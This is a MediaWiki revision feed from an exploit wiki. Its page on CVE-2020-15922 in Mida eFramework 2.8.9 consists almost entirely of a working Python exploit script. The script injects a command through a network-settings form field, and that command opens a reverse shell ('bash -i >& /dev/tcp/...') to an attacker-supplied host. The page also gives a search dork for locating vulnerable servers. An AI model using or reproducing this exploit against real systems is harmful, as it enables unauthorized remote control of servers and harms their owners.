<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2020-15922_Mida_eFramework_2.8.9_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fru</id>
	<title>CVE-2020-15922 Mida eFramework 2.8.9 遠程代碼執行漏洞/ru - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2020-15922_Mida_eFramework_2.8.9_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fru"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-15922_Mida_eFramework_2.8.9_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ru&amp;action=history"/>
	<updated>2026-04-03T20:36:33Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2020-15922_Mida_eFramework_2.8.9_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ru&amp;diff=5144&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;CVE-2020-15922 Mida eFramework 2.8.9 уязвимость удаленного выполнения кода&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-15922_Mida_eFramework_2.8.9_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ru&amp;diff=5144&amp;oldid=prev"/>
		<updated>2021-06-16T02:00:25Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;CVE-2020-15922 Mida eFramework 2.8.9 уязвимость удаленного выполнения кода&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
==Затронутая версия==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Version: &amp;lt;= 2.8.9&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Mida eFramework 2.8.9 - Remote Code Execution&lt;br /&gt;
# Google Dork: Server: Mida eFramework&lt;br /&gt;
# Date: 2020-08-27&lt;br /&gt;
# Exploit Author: elbae&lt;br /&gt;
# Vendor Homepage: https://www.midasolutions.com/&lt;br /&gt;
# Software Link: http://ova-efw.midasolutions.com/&lt;br /&gt;
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html&lt;br /&gt;
# Version: &amp;lt;= 2.8.9&lt;br /&gt;
# CVE : CVE-2020-15922&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#! /usr/bin/python3&lt;br /&gt;
# -*- coding: utf-8 -*-&lt;br /&gt;
&lt;br /&gt;
import argparse&lt;br /&gt;
import base64&lt;br /&gt;
import random&lt;br /&gt;
import requests&lt;br /&gt;
import subprocess&lt;br /&gt;
from requests.packages.urllib3.exceptions import InsecureRequestWarning&lt;br /&gt;
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
&lt;br /&gt;
def print_disclaimer():&lt;br /&gt;
    print(&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
    ---------------------&lt;br /&gt;
    Disclaimer:&lt;br /&gt;
    1) For testing purpose only.&lt;br /&gt;
    2) Do not attack production environments.&lt;br /&gt;
    3) Intended for educational purposes only and cannot be used for law&lt;br /&gt;
violation or personal gain.&lt;br /&gt;
    4) The author is not responsible for any possible harm caused by this&lt;br /&gt;
material.&lt;br /&gt;
    ---------------------&amp;quot;&amp;quot;&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def print_info():&lt;br /&gt;
    print(&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
[*] PoC exploit for Mida eFramework 2.8.9 PDC (CVE-2020-15922)&lt;br /&gt;
[*] Reference:https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html&lt;br /&gt;
[*] Vulnerability: OS Command Injection RCE in PDC/pages/network.php -&lt;br /&gt;
Reverse Shell&lt;br /&gt;
    ./CVE-2020-15922 http://192.168.1.60:8090/PDC/pages/network.php rev-IP&lt;br /&gt;
rev-PORT &amp;quot;&amp;quot;&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
def run_cmd(url,ip,port):&lt;br /&gt;
    rev_shell = &amp;quot;sudo bash -i &amp;gt;&amp;amp; /dev/tcp/{0}/{1} 0&amp;gt;&amp;amp;1&amp;quot;.format(ip,port)&lt;br /&gt;
    print(&amp;quot;[+] Reverse shell: {0}&amp;quot;.format(rev_shell))&lt;br /&gt;
    data = {&lt;br /&gt;
        &amp;quot;submit&amp;quot;:&amp;quot;True&amp;quot;,&lt;br /&gt;
        &amp;quot;ipaddress0&amp;quot;:&amp;quot;; {0}&amp;quot;.format(rev_shell),&lt;br /&gt;
        &amp;quot;netmask0&amp;quot;:&amp;quot;&amp;quot;,&lt;br /&gt;
        &amp;quot;gateway0&amp;quot;:&amp;quot;&amp;quot;,&lt;br /&gt;
        &amp;quot;dns1&amp;quot;:&amp;quot;&amp;quot;,&lt;br /&gt;
        &amp;quot;dns2&amp;quot;:&amp;quot;&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    # exec rev shell&lt;br /&gt;
    print(&amp;quot;[*] Starting reverse shell to {0} {1}...&amp;quot;.format(ip,port))&lt;br /&gt;
    try:&lt;br /&gt;
        r = requests.post(url,data=data,verify=False,timeout=1)&lt;br /&gt;
    except requests.exceptions.ReadTimeout:&lt;br /&gt;
        print(&amp;quot;[?] ...check if it worked&amp;quot;)&lt;br /&gt;
        pass&lt;br /&gt;
&lt;br /&gt;
def main():&lt;br /&gt;
    print_info()&lt;br /&gt;
    print_disclaimer()&lt;br /&gt;
    parser = argparse.ArgumentParser()&lt;br /&gt;
    parser.add_argument(&amp;quot;target&amp;quot;, type=str,&lt;br /&gt;
        help=&amp;quot;the complete target URL&amp;quot;)&lt;br /&gt;
    parser.add_argument(&amp;quot;ip&amp;quot;, type=str,&lt;br /&gt;
        help=&amp;quot;the ip address for reverse shell&amp;quot;)&lt;br /&gt;
    parser.add_argument(&amp;quot;port&amp;quot;, type=str,&lt;br /&gt;
        help=&amp;quot;the port for reverse shell&amp;quot;)&lt;br /&gt;
    args = parser.parse_args()&lt;br /&gt;
    run_cmd(args.target, args.ip, args.port)&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    main()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>